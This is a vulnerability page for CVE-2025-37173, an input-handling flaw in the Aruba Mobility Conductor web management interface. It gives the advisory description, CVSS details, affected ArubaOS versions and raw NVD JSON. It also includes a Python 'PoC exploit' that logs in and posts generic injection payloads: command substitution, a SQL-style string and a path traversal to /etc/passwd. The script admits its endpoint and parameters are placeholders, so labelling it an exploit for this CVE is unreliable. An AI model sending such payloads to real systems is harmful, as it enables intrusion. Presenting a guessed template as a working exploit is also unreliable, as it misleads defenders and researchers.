Security Vulnerability Report
CVE-2025-37173 CVSS 7.2 HIGH

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:44:31

Description

An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (from 6.5.4.0 up to, but excluding, 8.10.0.21)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (from 8.11.0.0 up to, but excluding, 8.13.1.1)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (from 10.3.0.0 up to, but excluding, 10.4.1.10)
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE (from 10.5.0.0 up to, but excluding, 10.7.2.2)
ArubaOS 10.x (all versions below the fixed release)
ArubaOS 8.x (all versions below the fixed release)
HPE Aruba Mobility Conductor (for exact versions, refer to the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-37173 PoC - Improper Input Handling in Aruba Mobility Conductor
# This PoC demonstrates the vulnerability in the web-based management interface
# Note: This requires valid high-privilege credentials
import requests
import urllib3

urllib3.disable_warnings()

TARGET_URL = "https://<aruba-conductor-ip>/v1/"
USERNAME = "admin"
PASSWORD = "admin_password"


def exploit_cve_2025_37173():
    """
    Exploit for CVE-2025-37173: Improper Input Handling in Aruba Mobility Conductor
    This vulnerability allows authenticated users to trigger unintended behavior
    through specially crafted input in the web management interface.
    """
    session = requests.Session()

    # Step 1: Authentication
    login_url = f"{TARGET_URL}api/login"
    login_data = {"username": USERNAME, "password": PASSWORD}

    try:
        response = session.post(login_url, json=login_data, verify=False, timeout=10)
        if response.status_code != 200:
            print(f"[-] Authentication failed: {response.status_code}")
            return False
        print("[+] Successfully authenticated")

        # Step 2: Send malicious input to trigger vulnerability
        # The specific payload depends on the vulnerable parameter.
        # The endpoint path and parameter names below are generic placeholders;
        # neither the description nor the advisory reference on this page
        # identifies the vulnerable endpoint or parameter.
        exploit_url = f"{TARGET_URL}api/configuration"
        exploit_data = {
            # Malicious input that bypasses validation
            "config_param": "'; malicious_payload; --",
            "system_command": "$(whoami)",
            "file_path": "../../../etc/passwd",
        }
        response = session.post(exploit_url, json=exploit_data, verify=False, timeout=10)
        if response.status_code == 200 and "error" not in response.text.lower():
            print("[+] Vulnerability potentially exploitable")
            print(f"[>] Response: {response.text}")
            return True
        else:
            print("[-] Exploitation failed or patched")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2025-37173 Exploitation Script")
    print("Target: Aruba Mobility Conductor (AOS-10/AOS-8)")
    print("=" * 50)
    exploit_cve_2025_37173()
```

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-37173",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T20:16:05.340",
    "lastModified": "2026-01-23T16:44:30.923",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An improper input handling vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor with valid credentials to trigger unintended behavior on the affected system."},
      {"lang": "es", "value": "Una vulnerabilidad de manejo de entrada inadecuado existe en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan ya sea los sistemas operativos AOS-10 o AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado con credenciales válidas desencadenar un comportamiento no deseado en el sistema afectado."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}
```